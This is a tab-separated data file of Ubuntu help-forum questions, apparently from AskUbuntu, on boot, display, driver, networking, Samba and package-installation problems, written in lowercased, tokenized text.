412233	low resolution on boot , not login	ok , here goes : when i was installing nvidia drivers and bumblebee for my 780m optimus laptop , the intel driver somehow made my display undetectable , making x output in the lowest resolution it could ( the failsafe resolution ) . to counter that , i found a guide for making xrandr force my 1080p resolution . that ended up with a script that i configured to start on login : xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120-hsync +vsync & & xrandr -- addmode edp1 `` 1920x1080_60.00 '' & & xrandr -- output edp1 -- mode `` 1920x1080_60.00 '' that works great , but with one hitch : the login screen still has that horrible , low resolution , which of course goes up after logging in . but my question is : how do i run the above script so that the login screen also has a decent resolution ?
412234	old files restored	for some reason my ubuntu was restored to another date . all the files i have created since that date are disappeared and the files i have deleted reappeared . i have restarted my pc many times and i could get back my files . its really strange !
412236	how to search klipper	how can i search through klipper 's saved clipboard history ? there does n't seem to be any option available .
412238	syspeek for ubuntu 13.10	i 've used syspeek since 12.04 . it 's a nice little tool that monitors system stats , like memory usage and processing usage , very neatly . my version of syspeek broke when i updated to 13.10 and i was hoping there would be a way to still use it . how can i install a version that works with ubuntu 13.10 ? there is a repository mentioned in the answers for this question , however it is , when i checked , still for 13.04 : how can i install syspeek in ubuntu 13.04 ?
412242	how and where do i add the line rescue/enable=true	i want to be able to use the option rescue/enable=true . how do i do this ? i have grub customizer installed . do i use it or do i need to do something else ?
412243	dual-booting ubuntu with windows 8 , motherboard settings inaccessible	i have a lenovo g580 with windows 8 preinstalled with 1 terabyte hard drive and 4gb ram . now the thing is , i installed ubuntu 13.10 64 bit version via a flash drive and status on the that moment was secure boot was enabled uefi mode enabled and i ca n't easily access my motherboard settings ( big problem urgent help needed ) but after installing ubuntu.. i could not access the motherboard settings because that option is gone ( not showing ) and the purple screen comes up when i boot showing options and windows boot manager gives some error there and only ubuntu boots i have tried boot repair but no progress i think it has to do something with the grub configuration fi le so please tell me how to wipe out ubuntu completely to get back my original state where i could access my motherboard settings and then reinstall ubuntu when i installed ubuntu , i created swap area of 3gb , /home partition of 12gb and/` root partition of 21gb , and installed ubuntu in root partition here is my boot repair output : http : //paste.ubuntu.com/6831351
412244	upgrading pdftk 1.41 to 1.44 how can i check for breaking changes ?	i have the wonderful task of finding out what ( if any ) breaking changes are if we upgrade from pdftk 1.41 to 1.44 here is our use-case we use pdftk on the command line from a php application this is a legacy application running on php version 5.2.x we are migrating it to php 5.3 if anyone has any past experience on this , please share thanks also if someone could add the tag pdftk
412245	extract a date from a filename for csh script ?	i am trying to write a csh script that will look at components of the filename to generate a date/time . the problem is , i have no idea how to extract part of a filename to use it . here is a sample filename : nam_218_20140126_1800_001.grb 20140126 is the date portion of the filename and 1800 is the time . i need to extract it and convert it to 2014-01-26_18:00:00 for use in an environment variable . any hints ? thanks
412248	mounting an sfs partition drive	simply put : i have a secondary harddrive formatted in sfs for some reason so ubuntu 13.10 ca n't see it . it used to be my windows backup which is why it always worked fine . now i no longer have windows so i ca n't access the files . does anyone know of a way to at least open it and transfer files out to another drive ? i can format it afterwards but getting the information out first is of utmost importance .
412249	problems with a radeon hd 5450 card on ubuntu server	i 'm having a hardware/driver problem with my radeon hd 5450 card . very grateful if anyone could help ! i 'm setting up a new ubuntu server . i 've assembled a machine and installed `` ubuntu server 12.04.3 lts '' . the installation went fine . but the system hanged at boot - and the monitor went to sleep . i found help online , saying it could be caused be an unsupported video card . and yes - when i add `` nomodeset '' at boot i get a login prompt . i did a `` jockey-text -- list '' , and found that the supported ubuntu-driver was `` fglrx '' . i installed that with apt-get . i thought that would solve it , but it did n't . now , when i boot without `` nomodeset '' , i get a blank screen . the monitor does n't go to sleep , but nothing is shown no matter what i do . the system is up , though - i can ping it and do a alt+prntscr r-s-e-i-n-u-b-reset . if i boot with `` nomodeset '' and then do a `` startx '' manually , i get the same blank screen . any ideas ? the `` fglrx '' -driver should word fine with my card . ( the card was released 2010 , the driver is from 2012 . ) i looked at the ubuntu wiki at `` http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide '' , and tested generating a new xorg.conf file and a couple of other things . but i 'd rather not hassle with installing drivers manually ( downloading drivers from amd.com and building packages from zip-files ) - i 'm not that experienced ...
412259	i installed ubuntu in a different drive and windows was already there in another drive	i installed ubuntu in a different drive and windows was already there in another drive at first ubuntu worked and windows was not being opened and now i cant open even ubuntu and windows . can u please help me opening ubuntu using bios ?
412260	installing tarball package of the latest version of firefox for ubuntu 12.04	currently i have ubuntu 12.04 version and current version of the firefox i have is 21.0 . i have downloaded `` firefox-26.0.tar.bz2 '' , can you please let me know what is the command to install firefox 26 version ?
412261	how to downgrade gtk+ easy	i have elementary os installed ( based on ubuntu 12.04 , gtk+ v.3.4.2 ) . i upgraded to gtk+ 3.6.1 using ppa . after using it i found a lot of inconsistencies in the interface ... can you help me to downgrade back to the gtk+ 3.4.2 without pain . at the moment if i try to do that via synaptic it suggests to delete almost all the gtk-based software . thank you !
412263	multiboot not working after windows 8 / ubuntu `` something else installation type ''	i installed ubuntu 13.10 last night on a hdd that already has windows 8 on it by choosing `` something else '' as an installation type . sda1 might be a primary ntfs partition ( not sure because windows 8 installer created it ) sda2 is a primary ntfs partition ( i created it on ubuntu gparted before i installed windows 8 ) same goes with sda3 ( i.e . as sda2 ) sda5 is swap area partition ( i do n't recall if i chose logical or primary but gparted says logical ) sda6 is a logical ext4 partition the last line is just free unallocated space as i wrote earlier , all partitions were created with a live cd with ubuntu 's gparted but the sda1 ntfs [ windows 8 ( loader ) ] . and all of the partitions i created i used for `` location of the new partition : '' the option `` beginning of this space '' . for the ubuntu partition i chose / as a mounting point . there was a warning saying something like `` everything will be deleted on that partition … do you wish to continue ? '' and i said yes . at the end of the installation there were other warnings . i did n't care to look at them and i clicked ok until the computer restarted . when it did , windows 8 booted instead of grub , meaning that i ca n't access ubuntu . when i boot the computer with live cd ubuntu and check gparted i get this : according to gparted sda1 is a primary partition as well can anyone please help me ?
412269	sudo unable to resolve host localhost.localdomain	hello guys when i run sudo nano /etc/proftpd/proftpd.conf i get this error : sudo unable to resolve host localhost.localdomain i 'm trying to set defaultroot to /var/wwwas per the following screenshots . when i press ctrl + x then write y and press enter , /kbd > it give me this error can someone please tell me how to resolve this problem ?
412273	post-install re-start returns to live usb	after installing ubuntu with a live usb ( erasing the previous os in the process ) , i got the post-install message stating that the computer should be re-started . however , merely re-starting takes me to the live usb again because , to prepare for the install , i had set the bios to boot into usb first . yet i could n't eject the live usb before re-starting . i tried shutting down after the installation , turning on , setting the bios to boot from the hd , but i was still greeted by the live usb .
412275	totem-plugin-viewer requires text/html decoder	i have a synology nas server on my lan and when i try to reproduce *.mkv files trough it ( video station ) on google chrome ( ubuntu 13.10 ) it appears a message . it tells that the totem-plugin-viewer requires text/html decoder . i 've followed every post that i 've read about this , but after installing several packages nothing has changed . i have another laptop with ubuntu 12.04 and i have exactly the same problem .
412277	overscanning acer x163 and nvidia , x server setting do not change	i 'm getting vexed with lack of friendly display options , i 've tried all sort of things but i ca n't seem to stop my monitor overscanning horizontally ( i.e missout just enough screen that scroll bars are missed ) . im running ubuntu 13.10 with a geforce 6150se 430 and have an acer 163x at 1633x768 . i 've tried using the nvidia xserver ( as sudo ) but i ca n't change the 1633x768+0+0 portion like others have resolved it on tv 's . i 've tried xvidtune but it seems to be `` incompatible with my configuration '' . also i 've tried turning off auto scan on my monitor , but then loading games ( such as hon ) i have to then adjust manually to suit the game , then back again when returning to desktop . also when running hon i 'm only running at 800x600 and the auto overscanning seems to be correct . i 've tried even editing the /etc/x11/zorg.conf to suit my monitors specs exactly : horizontal : 47.765 , refresh : 59.856 . but to no avail .
412279	how to repair ubuntu bootloader ?	i installed grub2 to dual boot another os alongside my ubuntu 12.04 lts , but decided against it at the last second . so i just did sudo apt-get purge grub , and it said it had purged all grub files , so i rebooted and guess what appears ? grub . how do i get rid of it ? . i 'm worried that the only way to get rid of it is to format my hard drive , or worse , even that wo n't help . edit : basically i am only running ubuntu 12.04 lts and would like it to go back to doing what it used to do , which was booting itself with no annoying grub ui , just the quick f12 boot menu bios stuff then boot .
412280	extracting iso images to hd	i have some iso images and would like to extract them to a hard-disk . they are not os images , i think they are music or audio books , i do n't know until they are extracted . thanks
412281	what ubuntu version to install ?	this is what i have an intel® celeron ( r ) cpu e3300 @ 2.50ghz × 2 what would be the best version ? i 've installed ubuntu 12.04 but it 's very slow .
412283	no cursor in login screen - ubuntu 13.10	whenever i boot into ubuntu on my family 's laptop , the login screen does n't display the cursor . the same problem happened in the user profiles , but i was able to remedy this with : gsettings set org.gnome.settings-daemon.plugins.cursor active false i had installed xubuntu for other users more familiar with windows to use , and noticed the issue after i restored the default ubuntu login and splash screens . as i myself am relatively new to ubuntu ( i 'm using it on a recommendation from a friend ) , i have no idea how to remedy this . i can post any information you need , as long as you can tell me how to get it . thank you !
412289	steam not working on dual monitors	i recently got a second monitor and since setting it up my steam has failed to load ever since . it is n't a steam problem , because i unplugged my 2nd monitor and it loaded again . also , unity3d has stopped working , and the display settings tell me the randr extension is not present . how can i fix all of these , but preferably steam ?
412290	how do you withdraw statistics from website using ping option in terminal ?	simple question how do you ping using terminal for example google and get back the statistics of it ? i mean packets transmitted packets lost ttl etc . because i tried different options using ping -- help but typing ping www.google.com the list in terminal just keeps roll down icmp_req=1 icmp_req=2 icmp_req=3 and 4,5,6,7 and so on ... and looks like never to stop .
412292	enable password asterisks when run command sudo ?	when i run sudo command , so when i mess up my password , i have to start over from scratch , is there a trick to enable password asterisks so i know how letter i have typed ?
412294	how to install ubuntu on notion ink adam	i understand that for each tablet device the way to install ubuntu differs . i have a notion ink adam which has amazing specs but i ca n't find a guide to do that . i 'm a programmer and want to make it my life 's mission to install it on this device only having experience of installing os 's on a desktop/laptop . i want to gain experience to install os ' s on tablets . where do i start ?
412295	how do i select in which os my computer boots ?	i have windows 7 on my pc and i have just installed ubuntu 12.04 in a separate partition but when the pc starts it goes straight to windows 7 . how can i have the option beforehand to chose which os i want to log onto ?
412299	help , no wireless for laptop hp pavilion notebook pc 15-n013sq	i ca n't use wireless on my laptop , i have no wireless network on the right upper corner . i have read some post but i do n't understand what to do at all , because i 'm a new user to ubuntu ( version 12.04.3 lts ) can anyone guide me to fix this issue please ? thank you .
412300	can i not sync a folder in ubuntu one	i would like upload some files via the browser to my ubuntu , one account in a folder called not_synced that is not synced back down to my computer . in another words i do n't want these few files stored locally on my computer . is this possible ?
412306	switching from ubuntu to windows 7 help ?	i switched from windows 7 to ubuntu 12.04 lts a week or so ago on my toshiba satellite l755 i believe . it worked fine , but i had internet problems and internal errors so i thought switching to 12.10 would fix everything , i was wrong . long story short , i want to switch back to windows 7 but when i installed over windows 7 . i do n't have a recovery cd because , can i create a recovery cd on another computer and use that ? thanks terry and everyone else who answered ! i was able to restore my computer using a back up from when i had windows 7 so if all goes well i 'll be set .
412308	how to recover from ubuntu 12.04 boot crash	i 've been running ubuntu for a short time but doing well . then today , wham , my boot failed & gave me a static screen with a list of 3 major failures like no disk space , no monitor , ... .. . i did a reboot and ran the linux 3.8 ubuntu recovery utility . it made lots of repairs while i watched the screen flow for several minutes - at the end i got an nice ubuntu brown start screen but then the message : `` 10.625xxxxx disabled by bios '' . then on a flashing screen i got : etc/acpi/power.sh : pm-powersave not found , followed by ( ok ) and then * '' checking battery state '' . there 's no way to stop this flashing screen except shut down . i ca n't get to a command line cursor . i 've seen lots of suggested solutions in this forum today but they all involve typing stuff from the command line like `` sudo '' followed by various stuff but i ca n't try them if i ca n't get a prompt ; how do i break this flashing loop to be able to try some of the commands i 've seen suggested here in the forum ? i should add that i 'm just a beginner so the terms and syntax are all new to me . thanks in advance for any help .
412313	video problems switching from 10.04 to 12.04	i use ubuntu 10.04 and i 'm trying to switch to 12.04 via clean install when i boot from the pendrive to install 12.04 , the screen loses signal and turns to black . i use a nvidia gt520 video card . is this because 12.04 needs a driver ? how should i proceed to install correctly ? . i 'm willing to put screenshots and everything if someone can guide me .
412314	ssh unable to connect with external ip ( port 22 is open )	i want to reach my home computer from work computer . i 've already installed openssh-server . status is : dpkg -l openssh-server desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii openssh-server 1:6.2p2-6ubu amd64 secure shell ( ssh ) server , for se i get my external ip addres by going : yougetsignal i check my port 22 and it is open . because i forwarded incoming call to internal ip address both with dmz and port forwarding methods . i check with internal ip : ssh 192.168.1.2 asa @ 192.168.1.2 's password : you have mail . last login : tue jan 28 21:38:06 2014 from localhost it works i check with external ip : ssh xx.xxx.xx.xx ssh : connect to host xx.xxx.xx.xx port 22 : connection timed out it doesnt work . what is wrong ?
412316	set no monitor resolution for xrdp	i have read numerous posts on different sites and still can not get this to work . i have an intel nuc that is running ubuntu , and i need to remote desktop into it . i need to sue xrdp because i am not allowed to install vnc on some of the servers i will be using to access this box . i ca n't figure out how to set the headless screen size . is there a way to do this ? i have compiled from github , but it made no difference .
412319	should i choose to install alongside windows 8 or something else	i 'm thinking about installing ubuntu ( dual boot ) as i might like it but i 'm not sure whether i should choose to install alongside windows 8 or something else . i do have 100 gb unallocated already for ubuntu on my d : / drive so i 'm good to go . i 've seen people configure their partitions specially ( they created swap and then used the remaining unallocated to install ubuntu ) . do i need to do this ? or will the installer handle it for me .
412324	how easy is it to triple boot windows 7 , ubuntu 13.10 , and arch linux ?	so i am getting real tired of ubuntu . i want to switch to arch , but keep my old windows 7 , and ubuntu installs for future use . i was wondering how easy it was to install arch along side the two other operating systems . do i have to change anything with my boot loader ? i am currently using the default grub that comes with an ubuntu 13.04 install . it may be worth noting that i do not have a separate home and / directory , so i will have to make all of my files separate . thanks !
412325	automatically connect to a wireless network using cli	i need my machine to connect to a wireless network automatically every time it starts i 'm running a headless server ( 10.04 ) and i use following commands to manually connect to the network sudo iwconfig wlan0 essid `` ssid_name '' sudo iwconfig wlan0 key xxxxx sudo iwconfig wlan0 key open sudo iwconfig wlan0 mode managed sudo dhclient wlan0 i will appreciate if we can do that by modifying etc/network/interfaces file please note that my router is running wep , thanks in advance
412326	repartitioning alternatives ?	out of the 320gb of hard drive space my computer came with , only 33 gb were partitioned to ubuntu , with the rest of the space ( 288 gb or so ) going to windows ntfs . of those 33 gb , 11 gb are allocated to the system and 20 gb to the home directory ; 2 more gb are swap and one last gigabyte is unallocated . as i currently stand , i am running 13.04 and my root partition is 93 % full with very little on my desktop . in order to repartition my disk , i 'll need to upgrade to 13.10 as i ca n't find a 13.04 iso on the ubuntu website ; once i do that i 'll boot into a live usb system and repartition from there . is there some way i can just delete the windows partition and reallocate ? i do n't think i can , but i 'm asking anyway . also , can i reassign the unallocated space ( all 1 gb of it ) to my filesystem ?
412330	boot ubuntu from usb option not available ?	so i followed the steps here and downloaded ubuntu onto my 32gb usb drive and i am trying to figure out how to boot up from the usb . when i go to my boot menu on my laptop i get boot from notebook hard drive and boot from live cd/dvd . no option to boot from external hard drive . i went to my bios and added network boot to the options but none of those seemed like what i wanted to do so i did n't select those , i did not want to mess anything up . my machine is an hp x16-1025nr entertainment notebook pc current os is windows vista . edit i also have a blank cd , if anybody knows how to boot from a blank cd i will try that too . i have a program on it to download the *.iso to the disk , it says mounting image , but when i boot from cd nothing happens it goes straight to windows vista which makes me think the image was not mounted correctly . i do n't really care which way , usb or cd i just want it to work without wiping my hard drive .
412333	intel graphics issue , ubuntu 13.10 dell 3737 17 inch laptop	i just purchased a dell 3737 13 inch laptop and immediately went to install ubuntu . upon boot i noticed that the display was a bit blurry and over saturated with green . i have tried installing the latest intel drivers from 01.org , but have not had any success , the installer finishes without error . is there a previous version of driver that i can go back to that works ? help !
412335	how to hide zip files in a jpg file in ubuntu ?	i need a way to hide zip files in a file . example i have a 1.zip , 2.zip ,3.zip contain data i need to concatenates them in a new file called example.jpg . is there a way ?
412343	network information for theft prevention	i have n't seen much of this around , and i 'm not a network expert/sysadmin , so i need some advice . i have a laptop that i 'd like to `` protect '' against theft ( this is really a game more than a real security system to be honest , but it 's fun to learn that way : ) ) : it 's pretty easy to configure postfix to send emails using a gmail account , and it 's easy as well to write a cron task at the system level to send emails periodically with arbitrary contents . if the laptop is connected to the internet , what are the most useful network ( or other ? ) information that i could send by e-mail to potentially locate the computer ? how to get them , and how to format them to be sent by email ?
412356	issue with partitioned disk while trying to install ubuntu 13.10 along with windows 8	i have an installed windows 8 os on my c drive and looking forward to install ubuntu 13.10 as a dual boot alongside windows 8 os . i have the following partition set up , system reserved : 100 mb c : 60 gb ( ntfs ) d : 40 gb ( ntfs ) e : 50 gb ( ntfs ) unallocated : 60 gb i am trying to install ubuntu on the unallocated space but this is not shown while installing the ubuntu . i do n't know where to create partitions for the ubuntu installation . can you please guide me here ? thanks !
412357	ssh disconnect from virtualbox because of too many connections	i 'm running virtualbox 4.1.12_ubuntu on an ubuntu 12.04 host . i 'm getting disconnected from my virtualbox ( ssh connection if i execute the following bash script . for i in { 1..200 } do curl `` http : //doesnotexist '' done obviously , the script is not useful but it allows to reproduce the problem easily . the same script works ( i.e . no disconnect ) if the host of the virtualbox is a windows machine . any idea which ubuntu/linux limitation is triggering my ssh connection to be terminated ? thanks for the help .
412362	open ubuntu server in windows explorer	i have a ubuntu server with some music on it . i would like my windows 7 and windows 8 laptops to access this music through windows explorer . if i can view them on windows explorer , my music programs can probably find and play the music . right now , i have samba installed on my ubuntu server . i went through the config file and changed everything , so all users can access files . ( i think ... i know i changed the setting when i was installing my printer , but i do not know if there are any additional changes i need ) . on the windows side , when i open windows explorer , i see network infrastructure : molecule . ( molecule is the name of my ubuntu server ) if i click on it , it takes me to a webpage ( ip address : 192.168.1.1 ) and asks me for a password . this obviously does not work since my ubuntu server ip address is actually : 192.168.1.119 . if you have any tips to make my ubuntu server appear in windows explorer with the correct ip address , and super accessible , i am all ears . smd.conf == [ global ] guest account = happy netbios name = carbon security = share workgroup = workgroup server string = % h server ( samba , ubuntu ) dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user [ public ] guest ok = yes guest only = yes path = / read only = no [ printers ] comment = all printers browseable = yes path = /var/spool/samba printable = yes guest ok = yes read only = yes create mask = 0700 [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = no guest ok = yes [ hydrogen ] comment = share hydrogen files path = /mnt/hydrogen browseable = yes read only = yes guest ok = yes force user = root create mask = 0777 directory mask = 0777
412363	when i mount my raid5 , there is constant activity ; how can i figure out what it is ?	there . i 'm using ubuntu 13.10 64bit . i have a 4-disk raid5 ( 3 disks , 1 spare ) setup , and it 's completely synced/built , and the ext4 filesystem it contains is clean . when i assemble the raid , all is fine ( that i can tell ) . when i mount the raid , it mounts without error , and i can use the mounted filesystem , but when it 's mounted , all 4 drives in the raid exhibit regular activity : the indicate lights flash every second or two . does anyone know what could be going on ? what can i use to tell ? note : the raid is not rebuilding/resyncing .
412365	help with /etc/network/interface	i 'm trying to set up my network using /etc/network/interfaces when i restart network interface using sudo ifdown eth1 & & sudo ifup eth1 , the system changes the current ip as the file i show before . but the system keeps rotating the ip . $ cat /etc/network/interfaces auto lo iface lo inet loopback the primary network interface auto eth1 iface eth1 inet static address 192.168.1.20 netmask 255.255.255.0 gateway 192.168.1.1 brodcast 192.168.1.255 nameservers 8.8.8.8 8.8.4.4
412366	problem with latest nvidia driver provided by canonical	i got on my workstation ubuntu 12.0.4.4 . today i noticed that new nvidia driver is available on official repo so i made and upgrade of nvidia driver from nvidia-309-updated to nvidia-331 . update process went quite smooth but after reboot i saw message from xorg that im in a troubleshooting mode and my card needs to be reconfigured . my graphic card is geforce gtx 770 and here is my [ xorg.log ] : https : //pastebin.com/raw.php ? i=xuswx1r1 . funny is the fact is i start system in a recovery mode and than i select option `` resume boot in a normal way '' all is fine . i already tried to reconfigure all nvidia packages apt-get install -- reinstall nvidia* any ideas ?
412370	kubuntu 13.10 changing x mode after login	i have a qnix 2710 monitor which reports bad edid . using the nouveau module the screen works fine @ 2560x1440 however the performance is n't ideal so i wish to use the nvidia binary . i have installed the binary fine , used nvidia-xconfig to generate an xorg.conf and then hand edited that conf to suit the monitor . i can get to the graphical login greeter in kubuntu 13.10 while using the nvidia binary , which to me says it is working . however , when i log in kde brings up its usual little window in the middle showing the login progress . when the second icon starts to appear the screen blanks and then goes in to a test pattern . this is how the screen behaves when the incorrect resolution is set- it has no scaler . so i can only conclude that the mode is changing post login . some digging found nvidia-auto-detect going for 800x600 , which will never work . i have crafted an xorg.conf which should work with the monitor . i have set it to ignore edid : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.88 ( buildmeister @ swio-display-x86-rhel47-06 ) wed mar 27 15:32:58 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 88.8 vertrefresh 59.5 modeline `` 2560x1440 '' 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync displaysize 597 336 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 2560x1440 '' option `` useedid '' `` false '' option `` useediddpi '' `` false '' option `` useedidfreqs '' `` false '' option `` exactmodetimingsdvi '' `` true '' # # # metamode for single qx2710 ( 2560x1440 ) # option `` metamodes '' `` dfp-0 : 2560x1440 +0 +0 '' endsubsection endsection in closing , my question is , how / why does the mode change post login ? are there additional xorg.conf 's or some such somewhere that apply after login ? thanks in advance . -lc
412371	problems when syncing ipod classic with rhythmbox	whenever syncing my ipod classic with rhythmbox , i get a popup displaying the error `` downstream is not seekable and headers ca n't be rewritten '' . what does this error mean ? is it fixable ? it causes only half of my library to be copied to the device . also , is there any more information that i can provide ? system info : -ubuntu gnome 13.10 ( 64 bit ) -gnome shell 3.8.4 -linux 3.11.0-15-generic # 23-ubuntu
412372	how to fix libreoffice and python3-uno	i can not install any new packages because of python3-uno dependency problems . apt-get said that python3-uno depends on libreoffice-core ( =1:3.5.7-0ubuntu4 ) but 1:3.5.7-0ubuntu5 is to be installed . i tried purging libreoffice * with no luck . now i can open the libre office core but can not make any files because they are all grayed out . how do i fix libre office and resolve the python3-uno dependency problems ? edit : i forgot to mention i 'm running 12.04 . purging python3-uno and libreoffice* did not help . installing updates on update manager and disabled all of my third party sources ( except for the one called third party sources or something like that ) . apt-get update did not help either . i 'm afraid to upgrade the distribution because last time i tried to i got the black screen when starting up after install error .
412373	problem with ppa of cinelerra	i try to instal cinelerra a bunch of times , in ppa , tar.xz , etc . but then i had big problems whit dependecies i use ubuntu 12.04 i made all the steps right , like this : sudo add-apt-repository ppa : cinelerra-ppa/ppa sudo apt-get update sudo apt-get install cinelerra-cv ( the problem occurs ) in below . sergio @ sergio-ms-7808 : ~ $ sudo apt-get install cinelerra-cv reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : cinelerra-cv 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/11,4 mb of archives . after this operation , 24,3 mb of additional disk space will be used . ( reading database ... 210470 files and directories currently installed . ) unpacking cinelerra-cv ( from ... /cinelerra-cv_1 % 3a2.2-0.15~ppa1~precise1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/cinelerra-cv_1 % 3a2.2-0.15~ppa1~precise1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/cinelerra/fonts/l_10646.ttf ' , which is also in package cinelerra-data 4.5-dmo1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/cinelerra-cv_1 % 3a2.2-0.15~ppa1~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
412374	why does step 8 of making the bootable usb take so long for my macbook air ?	i 'm on my macbook air late 2008 model , i 'm currently trying to make a bootable usb to add ubuntu to but i have gotten to the final stage of adding the image to the disk and now it is n't doing anything and has n't been for the past few minutes . how long does it actually take for this process to go on ?
412376	how i can delete evolution email completely ?	reason is i have configured my official account in evolution last day and and it stuckedup , then i tried to reconfigure its not working even the removed account is showing send & recv pls help ma friends
412380	when i click install xubuntu i get a black screen saying empty security header	sometimes it goes past this and lets me install but it just ended like this i am installing with a usb stick .
412383	ubuntu won ' t install or boot	i have used ubuntu for years . got a new laptop with windows 8 on it , which is satanic . so made a live usb like usual . i get a boot menu ( try without insalling ... install ... etc ) and i get the splash screen . but then after a while it throws up a bunch of text and goes black . stops reading the usb and just stops . i tried different usbs , i tried altenate programs ( unetboot , pendrive ) , redownloaded from different mirrors . i tried the nomodeset option . i get the back light with that , but otherwise no joy . i tried using a cd , same thing happens . i turned off secure boot in the bios . i am at my rope ' s end . i need a working computer asap . windows 8 doesn ' t work eta : i solved the problem , or rather problems . i had to do all of the following : 1 . turn off fast startup in windows 8 , 2 . turn off secure boot in bios , 3 . switch bios mode from uefi to csm 4 . switch sata controller from ahci to ide 5 . boot with nomodeset option . once installed , nomodeset and the sata change became unnecessary for booting . so restore defaults there .
412385	keyboard and mouse not working after few minutes in ubuntu 13.10	keyboard and mouse not working after few minutes in ubuntu 13.10 . i think this problem is not associate with hardware , because i had changed new mouse and keyboard also but this problem still occured . in my case after few minutes volume is autometically up and down , mouse not working properly ( wo n't click in textfield but sometimes it click in button ) and keyboard num lock on but it 's all key not working . please help me i got frustration from this problem ! ! ! ! !
412395	trying to remap prtsc key in laptop , no keycode	i 'm trying to remap prtsc key to insert ( to use it in vim ) , with /usr/bin/xmodmap -e `` keycode xxx = insert '' for it , i need to figure out what keycode for prtsc is . i 'm doing xev -event keyboard and pressing prtsc , but getting something strange keymapnotify event , serial 28 , synthetic no , window 0x0 , keys : 4294967228 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 not sure not extract keycode from this information .
412396	how to set up android kernel development environment for sony xperia zr ( and potentially similar ones )	building on and motivated by this great guide for installing the android sdk on ubuntu , i would like to collect instructions for installing all necessary tools and sources for compiling ( and potentially developing ) kernels for the sony xperia zr phone .
412401	tp link tl-wn8200nd not connecting - ubuntu 13.04	i searched for the driver of rtl8192cu . i tried with official driver . this is not for my linux installation kernel : uname -r 3.8.0-35-generic i tried with fixes in github . i tried with ndiswrapper and selecting xp driver that comes with cd . none of these worked . but after doing : sudo modprobe rtl8192cu adapter detected networks , but when i click it just does not connect . i have 2 adapters , but just the other one , a d-link , is detected : lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 2357:0100 bus 002 device 003 : id 058f:6364 alcor micro corp. au6477 card reader controller bus 002 device 004 : id 07d1:3c0d d-link system dwa-125 wireless n 150 adapter ( rev.a1 ) [ ralink rt3070 ] bus 002 device 005 : id 0458:012b kye systems corp. ( mouse systems ) i installed these too : sudo dkms status 8192cu , 1.8 , 3.8.0-35-generic , x86_64 : installed ndiswrapper , 1.58 , 3.8.0-35-generic , x86_64 : installed the 8192cu was installed from github link i pasted . update after upgrading to 13.10 : ➜ ~ sudo dkms status 8192cu , 1.8 , 3.11.0-15-generic , x86_64 : installed 8192cu , 1.8 , 3.8.0-35-generic , x86_64 : installed ndiswrapper , 1.58 : added ➜ ~ uname -r 3.11.0-15-generic ➜ ~ sudo modprobe rtl8192cu again , networks detected , but no connection .
412402	can not find crt1 crti	i am trying to compile fortran 77 by gcc 4.8 , ubuntu 12.04 . i get this and i do n't know how to fix it . i have to stay with fortran 77 . i am beginner in ubuntu . /usr/bin/ld : can not find crt1.o : no such file or directory /usr/bin/ld : can not find crti.o : no such file or directory /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status thank you in advance .
412404	ca n't we play videos with ease like how we play in winx based os ?	linux is still not user friendly os/applications properly running on it ! i agree linux as back end its power full operating system as long as we are using command/terminal mode . when i am trying to play video/dvd through video player which comes with ubuntu 12.04.3 lts , it plays video files but if i use seek button then it continues read dvd/cd but screen gets stuck on same place and after long time ( 10 min ) will go some other place and play . configuration : amd atholon ( tm ) 64 x2 dual core processor 4200+ 2.21 ghz . 4 gb of ram ga-m51gm-52g mother board . please correct me if i am having wrong impression on ubuntu+tools or please suggest me if any video player can play videos properly . regards paddy
412407	ubuntu 13.10 not recognizing bluetooth in combo wlan-bt card ?	running 13.10 on my hp tm2 laptop with an aftermarket ralink rt3090bc4 wifi/bluetooth combo wlan card . wifi works out of the box , but ubuntu is n't even showing a bluetooth device . please offer suggestions , and thanks .
412408	need major help : ubuntu 13.10 not detecting windows 8 operating system	just tried installing ubuntu for a class , but during installation it could not detect my windows 8 operating system . it has a few options on what to do but i do n't want to ruin my new computer . please help .
